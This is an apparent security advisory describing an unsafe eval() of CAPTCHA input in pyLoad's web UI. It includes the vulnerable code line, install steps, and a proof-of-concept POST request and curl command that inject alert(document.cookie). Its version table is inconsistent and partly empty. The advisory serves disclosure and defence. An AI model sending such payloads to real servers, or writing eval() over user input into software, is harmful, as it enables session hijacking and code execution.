Lack of data validation - Modify DOM Elements In pyload-ng
Description
pyLoad vulnerable to XSS through insecure CAPTCHA
Summary
An unsafe JavaScript evaluation vulnerability in pyLoad’s CAPTCHA processing code allows unauthenticated remote attackers to execute arbitrary code in the client browser and potentially the backend server. Exploitation requires no user interaction or authentication and can result in session hijacking, credential theft, and full system rce.
Details
The vulnerable code resides in
function onCaptchaResult(result) { eval(result); // Direct execution of attacker-controlled input }
The onCaptchaResult() function directly passes CAPTCHA results (sent from the user) into eval()
No sanitization or validation is performed on this input
A malicious CAPTCHA result can include JavaScript such as fetch() or child_process.exec() in environments using NodeJS
Attackers can fully hijack sessions and pivot to remote code execution on the server if the environment allows it
Reproduction Methods
Official Source Installation:
git clone https://github.com/pyload/pyload cd pyload git checkout 0.4.20 python -m pip install -e . pyload --userdir=/tmp/pyload
Virtual Environment:
python -m venv pyload-env source pyload-env/bin/activate pip install pyload==0.4.20 pyload
CAPTCHA Endpoint Verification
Technical Clarification:
The vulnerable endpoint is actually:
/interactive/captcha
Complete PoC Request:
POST /interactive/captcha HTTP/1.1 Host: localhost:8000 Content-Type: application/x-www-form-urlencoded cid=123&response=1%3Balert(document.cookie)
Curl Command Correction:
curl -X POST "http://localhost:8000/interactive/captcha" \ -d "cid=123&response=1%3Balert(document.cookie)"
Vulnerable Code Location:
The eval() vulnerability is confirmed in:
src/pyload/webui/app/static/js/captcha-interactive.user.js
Resources
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
 pypi | 0.20 |
Aliases
References